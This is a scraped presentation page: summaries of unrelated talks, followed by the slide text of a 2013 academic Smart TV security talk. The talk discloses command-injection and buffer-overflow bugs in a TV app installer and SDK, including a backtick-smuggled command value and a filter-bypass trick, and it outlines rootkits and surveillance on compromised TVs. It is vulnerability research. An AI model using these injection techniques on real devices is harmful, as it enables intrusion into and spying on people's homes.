The document describes a VoIP penetration testing service that involves 4 phases: reconnaissance through footprinting, scanning and enumerating VoIP devices on a network; vulnerability analysis using automated tools; exploiting vulnerabilities through various techniques like denial of service attacks and session hacking; and a final reporting phase that provides an executive summary and detailed technical report on findings and recommendations.
The document provides an introduction and overview of connecting Intel Edison devices to the DeviceHub IoT platform. It discusses:
1) Setting up a DeviceHub account and adding a project and device.
2) Installing necessary libraries on the Intel Edison like libmraa to control GPIO pins and connect to WiFi/MQTT.
3) Examples of sending sensor data from the Edison to DeviceHub including string, analog, and digital values and viewing the data in real-time graphs on the DeviceHub dashboard.
The document discusses the opportunities and challenges presented by the Internet of Things (IoT). It notes that IoT is expected to have a $3.9-11.1 trillion economic impact annually by 2025. While IoT allows for new revenue streams and improved user experiences, developing IoT projects faces many underestimated costs around hardware, software, cloud services, and security. The complexity of connecting and managing devices across end nodes, gateways and the cloud often results in delayed projects. Samsung's ARTIK IoT platform aims to address these challenges by providing a complete end-to-end solution for developing, connecting, managing and analyzing IoT devices and data.
evatron Technologies Pvt Ltd , which is a Product Design & Services Company focused on Internet of Things(IoT), Embedded Systems, VLSI Design, FPGA Based Design and PCB Design covering entire Electronic System Design and Manufacturing(ESDM) space from concept to Productization. We are also a member of IESA( Indian Electronics Semiconductor Association). We are actively working towards #MakeinIndia as well as #DesignInIndia based initiatives.
Malware first appeared on smartphones in 2004 with worms, viruses, and trojans. Android malware saw major increases from 2010-2011 while iOS malware remained low. Notable Android malware included DroidDream, which infected apps on the Android Market, and fake Angry Birds apps that rooted devices. Plankton is sophisticated Android spyware that collects device information. Possible smartphone attacks include DoS on base stations, DDoS on call centers, remote wiretapping, and SMS spamming. Prevention methods involve app store screening, OS security features, anti-virus software, and user education.
Track 4 session 6 - st dev con 2016 - samsung artikST_World
This document discusses the role of platforms in IoT and introduces the Samsung ARTIK IoT platform. It notes that IoT will impact nearly every market and have a total economic impact of $3.9-11.1 trillion annually by 2025. IoT projects face many underestimated costs including software development, cloud costs, and security concerns. The Samsung ARTIK platform aims to provide a complete end-to-end IoT solution from edge nodes and gateways to cloud and apps to help customers focus on their applications. Key capabilities include wireless connectivity, scalable hardware, integrated middleware, device and cloud APIs/SDKs, security, device management, and data analytics tools.
Tevatron Technologies Pvt Ltd is an electronics chip design and embedded systems company focused on VLSI design, PCB design, and nurturing related education. The company was founded by professionals with over 14 years experience in VLSI/embedded industries. Tevatron provides services from concept development to prototype to product development in fields like healthcare, automotive, defense, and more. Key services include VLSI chip design, embedded systems development, technical documentation, and concept-to-product solutions.
Google Voice Assistance Based Smart Home AutomationGauthamG4
The idea behind Google assistant-controlled Home automation is to control home devices with voice. On the market there are many devices available to do that, but making our own is awesome. In this project, the Google assistant requires voice commands. Adafruit account which is a cloud based free IoT web server used to create virtual switches, is linking to IFTTT website abbreviated as “If This Than That” which is used to create if else conditional statements. The voice commands for Google assistant have been added through IFTTT website. In this home automation, as the user gives commands to the Google assistant, Home appliances like Bulb, Fan and Motor etc., can be controlled accordingly. The commands given through the Google assistant are decoded and then sent to the microcontroller, the microcontroller in turn control the relays connected to it. The device connected to the respective relay can be turned On or OFF as per the users request to the Google Assistant. The microcontroller used is NodeMCU (ESP8266) and the communication between the microcontroller and the application is established via Wi-Fi (Internet).
Similar to Smart TV Security - #1984 in 21st century - (20)
[Blockchain and Cryptocurrency] 01. SyllabusSeungjoo Kim
'Blockchain and Cryptocurrency' Subject @ Korea University, 2021
01. Syllabus
02. Blockchain Overview and Introduction - Technical Concepts of Blockchain Systems -
03. Blockchain's Theoretical Foundation, Cryptography
04. Bitcoin and Nakamoto Blockchain
05. Ethereum and Smart Contract
06. NFT and Metaverse
07. Cardano(ADA) and Other Altcoins
08. Dark Coins
09. Blockchain Usage Beyond Currency - Way to Design Good Blockchain Business Models -
[Blockchain and Cryptocurrency] 02. Blockchain Overview and Introduction - Te...Seungjoo Kim
'Blockchain and Cryptocurrency' Subject @ Korea University, 2021
01. Syllabus
02. Blockchain Overview and Introduction - Technical Concepts of Blockchain Systems -
03. Blockchain's Theoretical Foundation, Cryptography
04. Bitcoin and Nakamoto Blockchain
05. Ethereum and Smart Contract
06. NFT and Metaverse
07. Cardano(ADA) and Other Altcoins
08. Dark Coins
09. Blockchain Usage Beyond Currency - Way to Design Good Blockchain Business Models -
[Blockchain and Cryptocurrency] 03. Blockchain's Theoretical Foundation, Cryp...Seungjoo Kim
'Blockchain and Cryptocurrency' Subject @ Korea University, 2021
01. Syllabus
02. Blockchain Overview and Introduction - Technical Concepts of Blockchain Systems -
03. Blockchain's Theoretical Foundation, Cryptography
04. Bitcoin and Nakamoto Blockchain
05. Ethereum and Smart Contract
06. NFT and Metaverse
07. Cardano(ADA) and Other Altcoins
08. Dark Coins
09. Blockchain Usage Beyond Currency - Way to Design Good Blockchain Business Models -
[Blockchain and Cryptocurrency] 04. Bitcoin and Nakamoto BlockchainSeungjoo Kim
'Blockchain and Cryptocurrency' Subject @ Korea University, 2021
01. Syllabus
02. Blockchain Overview and Introduction - Technical Concepts of Blockchain Systems -
03. Blockchain's Theoretical Foundation, Cryptography
04. Bitcoin and Nakamoto Blockchain
05. Ethereum and Smart Contract
06. NFT and Metaverse
07. Cardano(ADA) and Other Altcoins
08. Dark Coins
09. Blockchain Usage Beyond Currency - Way to Design Good Blockchain Business Models -
[Blockchain and Cryptocurrency] 05. Ethereum and Smart ContractSeungjoo Kim
'Blockchain and Cryptocurrency' Subject @ Korea University, 2021
01. Syllabus
02. Blockchain Overview and Introduction - Technical Concepts of Blockchain Systems -
03. Blockchain's Theoretical Foundation, Cryptography
04. Bitcoin and Nakamoto Blockchain
05. Ethereum and Smart Contract
06. NFT and Metaverse
07. Cardano(ADA) and Other Altcoins
08. Dark Coins
09. Blockchain Usage Beyond Currency - Way to Design Good Blockchain Business Models -
[Blockchain and Cryptocurrency] 06. NFT and MetaverseSeungjoo Kim
'Blockchain and Cryptocurrency' Subject @ Korea University, 2021
01. Syllabus
02. Blockchain Overview and Introduction - Technical Concepts of Blockchain Systems -
03. Blockchain's Theoretical Foundation, Cryptography
04. Bitcoin and Nakamoto Blockchain
05. Ethereum and Smart Contract
06. NFT and Metaverse
07. Cardano(ADA) and Other Altcoins
08. Dark Coins
09. Blockchain Usage Beyond Currency - Way to Design Good Blockchain Business Models -
[Blockchain and Cryptocurrency] 07. Cardano(ADA) and Other AltcoinsSeungjoo Kim
'Blockchain and Cryptocurrency' Subject @ Korea University, 2021
01. Syllabus
02. Blockchain Overview and Introduction - Technical Concepts of Blockchain Systems -
03. Blockchain's Theoretical Foundation, Cryptography
04. Bitcoin and Nakamoto Blockchain
05. Ethereum and Smart Contract
06. NFT and Metaverse
07. Cardano(ADA) and Other Altcoins
08. Dark Coins
09. Blockchain Usage Beyond Currency - Way to Design Good Blockchain Business Models -
[Blockchain and Cryptocurrency] 08. Dark CoinsSeungjoo Kim
1. The document introduces Kim Seung-ju, a professor at Korea University known for his work in cybersecurity and cryptography. It lists his educational background and career highlights, which include being the head of cryptography teams at KISA and publications in top security conferences.
2. The document then discusses various cryptocurrencies that aim to improve anonymity compared to Bitcoin, such as Dash, Monero, and Zcash. It explains the technological approaches used by these cryptocurrencies like coin mixing for Dash, ring signatures and stealth addresses for Monero, and zero-knowledge proofs for Zcash.
3. Zcash is highlighted for using a cryptographic technique called zk-SNARKs to provide anonymity for transactions without revealing details
[Blockchain and Cryptocurrency] 09. Blockchain Usage Beyond Currency - Way to...Seungjoo Kim
'Blockchain and Cryptocurrency' Subject @ Korea University, 2021
01. Syllabus
02. Blockchain Overview and Introduction - Technical Concepts of Blockchain Systems -
03. Blockchain's Theoretical Foundation, Cryptography
04. Bitcoin and Nakamoto Blockchain
05. Ethereum and Smart Contract
06. NFT and Metaverse
07. Cardano(ADA) and Other Altcoins
08. Dark Coins
09. Blockchain Usage Beyond Currency - Way to Design Good Blockchain Business Models -
Why is it getting harder to train the cybersecurity workforce? (ExtendedVersion)Seungjoo Kim
Even in this pandemic situation, thank you for making and running the HITCON 2021 so well. Thank you for giving me the chance to talk!
This presentation is revised by reinforcing Q&A. Look forward to seeing you offline next year!
Kid Blockchain - Everything You Need to Know - (Part 1)Seungjoo Kim
Kid Blockchain - Everything You Need to Know - (Part 1)
01. 화폐의 역사 : 금에서부터 간편결제에 이르기까지 ... 4P
02. 비트코인의 탄생 ... 27P
03. 비트코인과 블록체인의 세부 동작원리 ... 85P
04. 작업증명(PoW)이란? ... 158P
05. 비트코인과 블록체인이 당면한 기술적 문제 ... 171P
Application of the Common Criteria to Building Trustworthy Automotive SDLCSeungjoo Kim
Seungyeon Jeong, Sooyoung Kang, and Seungjoo Kim, "Application of the Common Criteria to Building Trustworthy Automotive SDLC", Proc. of The 19th ICCC 2020, The 19th International Common Criteria Conference, Virtual (online) Conference, November 16-18, 2020.
Assurance-Level Driven Method for Integrating Security into SDLC ProcessSeungjoo Kim
Sooyoung Kang, Seungyeon Jeong, and Seungjoo Kim, "Assurance-Level Driven Method for Integrating Security into SDLC Process”, Proc. of The 18th CCUF Workshop 2020, The 18th Common Criteria Users Forum Workshop, Virtual (online) Conference, November 12, 2020.
How South Korea Is Fighting North Korea's Cyber ThreatsSeungjoo Kim
Seungjoo Kim, "How South Korea Is Fighting North Korea's Cyber Threats", Asia Transnational Threats Forum - Virtual Roundtable on North Korean Cyber Threats, Center for East Asia Policy Studies at BROOKINGS, October 15, 2020.
o 행 사 명 : 포스트코로나 시대의 ICT산업 미래전략포럼
o 일시/장소 : ‘20.5.22.(금) 10:00~16:30 / 에스팩토리(서울 성수동 소재)
o 주최/후원 : KAIT, KCA, IITP / SKT, KT, LGU+, LG전자 등
o 참 석 자 : 과기정통부 2차관, 정보통신산업정책관 및 ICT산업분야별 전문가 등
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...Seungjoo Kim
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common Criteria @ ICCC 2019 (International Common Criteria Conference), which is a major conference for the community of experts involved in security evaluation
Verification of IVI Over-The-Air using UML/OCLSeungjoo Kim
Verification of IVI Over-The-Air using UML/OCL @ ICCC 2019 (International Common Criteria Conference), which is a major conference for the community of experts involved in security evaluation
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
Things to Consider When Choosing a Website Developer for your Website | FODUUFODUU
Choosing the right website developer is crucial for your business. This article covers essential factors to consider, including experience, portfolio, technical skills, communication, pricing, reputation & reviews, cost and budget considerations and post-launch support. Make an informed decision to ensure your website meets your business goals.
CAKE: Sharing Slices of Confidential Data on BlockchainClaudio Di Ciccio
Presented at the CAiSE 2024 Forum, Intelligent Information Systems, June 6th, Limassol, Cyprus.
Synopsis: Cooperative information systems typically involve various entities in a collaborative process within a distributed environment. Blockchain technology offers a mechanism for automating such processes, even when only partial trust exists among participants. The data stored on the blockchain is replicated across all nodes in the network, ensuring accessibility to all participants. While this aspect facilitates traceability, integrity, and persistence, it poses challenges for adopting public blockchains in enterprise settings due to confidentiality issues. In this paper, we present a software tool named Control Access via Key Encryption (CAKE), designed to ensure data confidentiality in scenarios involving public blockchains. After outlining its core components and functionalities, we showcase the application of CAKE in the context of a real-world cyber-security project within the logistics domain.
Paper: https://doi.org/10.1007/978-3-031-61000-4_16
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Programming Foundation Models with DSPy - Meetup SlidesZilliz
Prompting language models is hard, while programming language models is easy. In this talk, I will discuss the state-of-the-art framework DSPy for programming foundation models with its powerful optimizers and runtime constraint system.
OpenID AuthZEN Interop Read Out - AuthorizationDavid Brossard
During Identiverse 2024 and EIC 2024, members of the OpenID AuthZEN WG got together and demoed their authorization endpoints conforming to the AuthZEN API
Driving Business Innovation: Latest Generative AI Advancements & Success StorySafe Software
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
Your One-Stop Shop for Python Success: Top 10 US Python Development Providersakankshawande
Simplify your search for a reliable Python development partner! This list presents the top 10 trusted US providers offering comprehensive Python development services, ensuring your project's success from conception to completion.
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfTechgropse Pvt.Ltd.
In this blog post, we'll delve into the intersection of AI and app development in Saudi Arabia, focusing on the food delivery sector. We'll explore how AI is revolutionizing the way Saudi consumers order food, how restaurants manage their operations, and how delivery partners navigate the bustling streets of cities like Riyadh, Jeddah, and Dammam. Through real-world case studies, we'll showcase how leading Saudi food delivery apps are leveraging AI to redefine convenience, personalization, and efficiency.
Monitoring and Managing Anomaly Detection on OpenShift.pdfTosin Akinosho
Monitoring and Managing Anomaly Detection on OpenShift
Overview
Dive into the world of anomaly detection on edge devices with our comprehensive hands-on tutorial. This SlideShare presentation will guide you through the entire process, from data collection and model training to edge deployment and real-time monitoring. Perfect for those looking to implement robust anomaly detection systems on resource-constrained IoT/edge devices.
Key Topics Covered
1. Introduction to Anomaly Detection
- Understand the fundamentals of anomaly detection and its importance in identifying unusual behavior or failures in systems.
2. Understanding Edge (IoT)
- Learn about edge computing and IoT, and how they enable real-time data processing and decision-making at the source.
3. What is ArgoCD?
- Discover ArgoCD, a declarative, GitOps continuous delivery tool for Kubernetes, and its role in deploying applications on edge devices.
4. Deployment Using ArgoCD for Edge Devices
- Step-by-step guide on deploying anomaly detection models on edge devices using ArgoCD.
5. Introduction to Apache Kafka and S3
- Explore Apache Kafka for real-time data streaming and Amazon S3 for scalable storage solutions.
6. Viewing Kafka Messages in the Data Lake
- Learn how to view and analyze Kafka messages stored in a data lake for better insights.
7. What is Prometheus?
- Get to know Prometheus, an open-source monitoring and alerting toolkit, and its application in monitoring edge devices.
8. Monitoring Application Metrics with Prometheus
- Detailed instructions on setting up Prometheus to monitor the performance and health of your anomaly detection system.
9. What is Camel K?
- Introduction to Camel K, a lightweight integration framework built on Apache Camel, designed for Kubernetes.
10. Configuring Camel K Integrations for Data Pipelines
- Learn how to configure Camel K for seamless data pipeline integrations in your anomaly detection workflow.
11. What is a Jupyter Notebook?
- Overview of Jupyter Notebooks, an open-source web application for creating and sharing documents with live code, equations, visualizations, and narrative text.
12. Jupyter Notebooks with Code Examples
- Hands-on examples and code snippets in Jupyter Notebooks to help you implement and test anomaly detection models.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slackshyamraj55
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Speck&Tech
ABSTRACT: A prima vista, un mattoncino Lego e la backdoor XZ potrebbero avere in comune il fatto di essere entrambi blocchi di costruzione, o dipendenze di progetti creativi e software. La realtà è che un mattoncino Lego e il caso della backdoor XZ hanno molto di più di tutto ciò in comune.
Partecipate alla presentazione per immergervi in una storia di interoperabilità, standard e formati aperti, per poi discutere del ruolo importante che i contributori hanno in una comunità open source sostenibile.
BIO: Sostenitrice del software libero e dei formati standard e aperti. È stata un membro attivo dei progetti Fedora e openSUSE e ha co-fondato l'Associazione LibreItalia dove è stata coinvolta in diversi eventi, migrazioni e formazione relativi a LibreOffice. In precedenza ha lavorato a migrazioni e corsi di formazione su LibreOffice per diverse amministrazioni pubbliche e privati. Da gennaio 2020 lavora in SUSE come Software Release Engineer per Uyuni e SUSE Manager e quando non segue la sua passione per i computer e per Geeko coltiva la sua curiosità per l'astronomia (da cui deriva il suo nickname deneb_alpha).
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
“An Outlook of the Ongoing and Future Relationship between Blockchain Technologies and Process-aware Information Systems.” Invited talk at the joint workshop on Blockchain for Information Systems (BC4IS) and Blockchain for Trusted Data Sharing (B4TDS), co-located with with the 36th International Conference on Advanced Information Systems Engineering (CAiSE), 3 June 2024, Limassol, Cyprus.
1. Smart TV Security
- #1984 in 21st century -
08 March 2013
SeungJin Lee (1st Author)
CIST(Center for Information Security
Technologies), Korea University
beist@grayhash.com
CIST(Center for Information Security
Technologies), Korea University
skim71@korea.ac.kr
Seungjoo Kim (Corresponding Author)
2. 2
About me
SeungJin Lee (aka beist)
Ms-Phd course at Korea University
A member of IAS LAB, CIST
Professor. SeungJoo Kim
Interested in offensive security research
Hunting security bugs both in code and
binaries
Exploiting
Wins at hacking contests
Running hacking contests/conferences many
times
Speaking at security conferences
3. 3
About this talk
Research motivation
What is Smart TV?
Smart TV Attack surfaces
Rootkits for Smart TV
Persistence shells
Working for 24/7
Even when users press power button to turn off TV
Surveillance program
Smart TV threat evaluation
Privacy
Conclusion
4. 4
Note about this talk
This talk is more about security bugs and
rootkits than about firmware for TV
This talk more covers rootkits than security
bugs and exploitations
As they’re not different to traditional
techniques
This talk is talking about general security
issues of all Smart TV vendors
5. 5
Research motivation
Smart TV is being world popular
In 2012, over 80,000,000 Smart TVs Sold
People say, it’s going to be more popular
Lack of security research
We hardly see security research on Smart
TV yet
Smart TV is like “home-version smartphone”
Might be very scary if it’s pwned
We’ll see.
Wanted to measure privacy problem
6. 6
Smart TV
Smart TV is now used in many fields
Home entertainment
Office purpose
Educational purpose
Business purpose
Smart TV is not just TV
Changing psychological consumer behavior
and its impact on the commercial sector
The feasibility of potential applications for
smart TV in the consumer electronics market
The integration of smart TV platforms with
IC technology solutions
7. 7
Smart TV
Samsung, LG, Panasonic, Sony and others
dive into Smart TV industry
Smart TV is a regular PC but shows you TV
programs
Smart TV = TV + PC
Also, built-in Camera and voice sensor
At the moment, only fancy models have
built-in camera and voice sensor
10. 10
Smart TV
Just like a regular PC
OS: modern OS like Linux (Or embedded)
CPU: ARM
Platform:
Vendor’s own
It works like a regular PC
Boot-up, load kernel
Execute programs, kill programs, ETC
Usually shells not provided by vendors
11. 11
Smart TV feature
Camera and MIC
Motion sensor
Voice sensor
TV can recognize your motion
You move your arm and hand
Then select any menu on TV
ETC
TV can recognize your voice
To turn on TV: “Hi TV, turn on”
To volume down/up: “Volume up/down”
ETC
12. 12
Big hurdles of Smart TV research
Lack of documentations and research
The TV is blackbox
No source code
Smart TV software is huge
More than hundreds mega bytes
Vendor write most of code
Hard to find interesting spots
Research can brick your TV
Even factory reset doesn’t work
You have to send it to A/S center
Which I did
If you do any mistake, the TV will be rebooting
Hundreds on-off is so tedious
13. 13
Smart TV attack vectors
Smart TV has almost same attack vectors as
Smart Phone
A hacker who uploads malicious apps to your
Smart TV app market
A hacker outside of your network
A hacker in your network
Network daemons
Man in The Middle
A hacker who can be around
Who can touch your TV (Physical attacks: USB/etc)
Who can see your TV (Remote controller)
Who can be around your home (Broadcast signals)
14. 14
Research start on Smart TV
How to start research on mobile phones?
You should do rooting your phone first
Both iOS and Android
Nothing really much without it
How to start research on Smart TV?
You should get a shell first as well!
15. 15
Research start on Smart TV
We started with
Firmware information from Samygo
Firmware is encrypted by vendor but
Samygo have password information for
many firmware
Unfortunately, they didn’t have any
information for our TV model
So, we got an old version and different model
firmware, but much better than nothing
Extract executable binaries and IDA time!
And, UART
16. 16
Research start on Smart TV
Executable binaries
Yay! IDA time!
IDA analyzes the ARM code very well
UART
Our target has a lot of DEBUG messages
which you can see them through UART
Booting logs
Exception messages
Segmentations messages with register values
‘Strings’ are very gold when you feel lost
yourself in a huge binary on IDA
17. 17
Enable UART
Our TV UART is disabled by default
You should get into ‘Service Mode’ to
make UART enabled
How to get into ‘Service Mode’
TV has 2 Service Modes
1: Power off + Mute + 1 + 8 + 2 + Power On
This is not for us as it doesn’t have “Advanced
Mode”
2: Info + Factory key combination
Our remote controller doesn’t have “Factory
key”, so, we should do radio frequency stuff
18. 18
Enable UART
We use Arduino to send “Info” and “Factory”
Keys to TV
http://wiki.samygo.tv/index.php5/Etherne
t_to_IR_and_Serial_Console_Interface
We just added this
Void loop() {
…
Data = 0x1f;
Company_name::SendCommand(Type, Device, Data, Crc);
delay(1000);
Data = 0x3b;
Company_name::SendCommand(Type, Device, Data, Crc);
}
20. 20
UART enable commands
Set serial port speed: (bps)
1. 300
2. 1200
3. 2400
4. 4800
5. 9600
6. 19200
7. 38400
8. 57600
9. 115200
10. BRG raw value
(1)>9
Data bits and parity:
1. 8, NONE *default
2. 8, EVEN
3. 8, ODD
4. 9, NONE
(1)>1
Stop bits:
1. 1 *default
2. 2
(1)>
Receive polarity:
1. Idle 1 *default
2. Idle 0
(1)>2
Select output type:
1. Open drain (H=Hi-Z, L=GND)
2. Normal (H=3.3V, L=GND)
(1)>2
Ready
UART>(1)
UART bridge Reset to exit
Are you sure? y
21. 21
There might be an easy way
If you can use the modified firmware on
samygo, just use it
Then, you have a shell and it’s root
Samygo has resources and tools that are
very useful for security research
But in our case, as we bought a very brand
new and most expensive TV, there was
nothing available at the time
22. 22
So, we’re ready to find bugs
Again, having binaries and UART is very
important as the target is blackbox
We’ll tell you later how to see debug
messages without UART after having
a shell on the box
From now, our approach is
1: Reversing binaries
2: Finding some spots to test
3: Checking messages from UART
4: Repeating 1 - 3
23. 23
Smart TV App Store
Almost same as mobile app market
Developers can make apps for TV
SNS clients, NEWS apps, Game, SKYPE, ETC
Some vendors don’t allow developers to
use native languages like C/C++
But ok - HTML/Javascript/Flash
It could be because of portability
Also because of security policy
Vendors try to prevent bad guys from
making/uploading malicious apps to
application market
27. 27
Smart TV App Store
What is to write in Javascript/Flash for app?
It means
Can’t call system calls directly
Can’t access many resources like files
Your code run in VM (Javascript/Flash)
Nothing really much you can do
Attack point
Using web browser bugs (including Flash)
Traditional attacks can be done (webkit/flash)
Using bugs in SDK provided by vendors
And the app installer
Will talk about this
28. 28
Smart TV App Store
Fortunately (To both developers and
attackers), vendors provide SDK for
development
SDK has many features
FILE I/O
Download and upload via network
Screen control API
Basic function of TV control API
App control API
ETC
29. 29
Smart TV App Store
Security policy of App
Some important APIs do sanity-checks
EX) You can’t do “../” when file open()
APIs work like they’re in sandbox
- openCommonFile() calls jx_GetFullPath()
jx_GetFullPath(filepath, stricted_directory)
{
...
if not filepath starts with stricted_directory:
exit
...
}
30. 30
Smart TV App Store
Problem of SDK security policy
API level sandbox is not best sandbox
Hard to ensure hundreds of APIs do their
sandbox job properly
Hard to implement all security checks in all
APIs
Checks in File I/O API might be very robust
But what about checks in Audio Control API?
All app is running as ‘root’ privilege
Which means if there is any single API bug,
you’d get a root privilege shell
31. 31
Smart TV App Store
APP bug case #1
The app installer parses a XML file
XML file contains
App name
Title
Compression
Description
Download
Etc
“Download” field is a URL and a zip of
your app
34. 34
Smart TV App Store
_ZN13CNNaviAppBase9execShellEPKc()
It does system()
vfork()
waitpid()
execl()
Our “Download” value is passed to this with a
prefix command
EX) “/bin/unzip OUR_DOWNLOAD_VALUE”
There is a sanity-check for ‘|’, ‘;’ and etc,
before our value is passed, but misses some
linux special characters like ‘`’ (tilt)
35. 35
Smart TV App Store
So, it’s an easy bug
$ some_command myapp.`whoami`zip
But there is a hurdle
we can’t use ‘/’ character
Solution:
Use ${OLDPWD}
The environment variable has ‘/’ in this
case as the installer is a background
process
36. 36
Smart TV App Store
APP bug case #2
Another bug in the installer
The installer uses “widget_id” value for
Making a directory for our app
But wrong string handling
LDMIA R9, {R0-R3}
SUB R5, R5, #4
SUB R12, R11, #-var_650
STR R12, [R11,#s]
STMIA R5, {R0-R3}
SUB R0, R11, #-var_510
MOV R2, #0xF0 ; n
MOV R1, R6 ; c
SUB R0, R0, #4 ; s
BL memset
MOV R0, R5
LDR R1, [R7,#0x34]
BL _ZN8PCString7ConcateEPcPKc
37. 37
Smart TV App Store
_ZN8PCString7ConcateEPcPKc()
This wrapper function does
strcat() inside
Simple stack buffer overflow
------------------------------------------------------------
PC, LR MEMINFO
------------------------------------------------------------
PC:61616160, LR:12834
------------------------------------------------------------
No VMA for ADDR PC
------------------------------------------------------------
03e0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
0400: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
0420: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
38. 38
Smart TV App Store
APP bug case #3 and more
As we say, there are hundreds of API that
developers can use
There are many functions that handle
string/data wrongly
Very kind memory corruption bugs
And even system() bugs
FILESYSTEM.Unzip()
FILESYSTEM.Move()
FILESYSTEM.Copy()
FILESYSTEM.Delete()
Delete() actually doesn’t work as it checks first if the
given path exists before system(delete_file)
40. 40
Smart TV App Store
FILESYSTEM.Unzip() bug
Game over
SUB R1, R11, #-var_430
LDR R0, [R11,#var_440]
SUB R1, R1, #0xC
BL j__ZN3sef18CEmpTaskFileSystem10SystemCallEPKc
MOV R0, R6
BL _ZN3sef12SefExecShellEPKc
41. 41
Smart TV App Store
There are more security bugs in API but
won’t list them up all
Over again, this is not only API’s problem.
This is because all app is running as ‘root’
privilege
Also, TV strongly relies on secure (but
maybe insecure) coding but not security
protection like sandbox
46. 46
A hacker outside of your network
SNS client is a gold vector for Smart TV
hackers
Smart TV is more fancy than you think
Vendors are really building a new
software platform
You have Smart TV edition facebook
called “Our story” (Faked name)
They have a facebook app inside, anyway
You make friends and send photos,
messages and etc
Of course this is a good attack point
47. 47
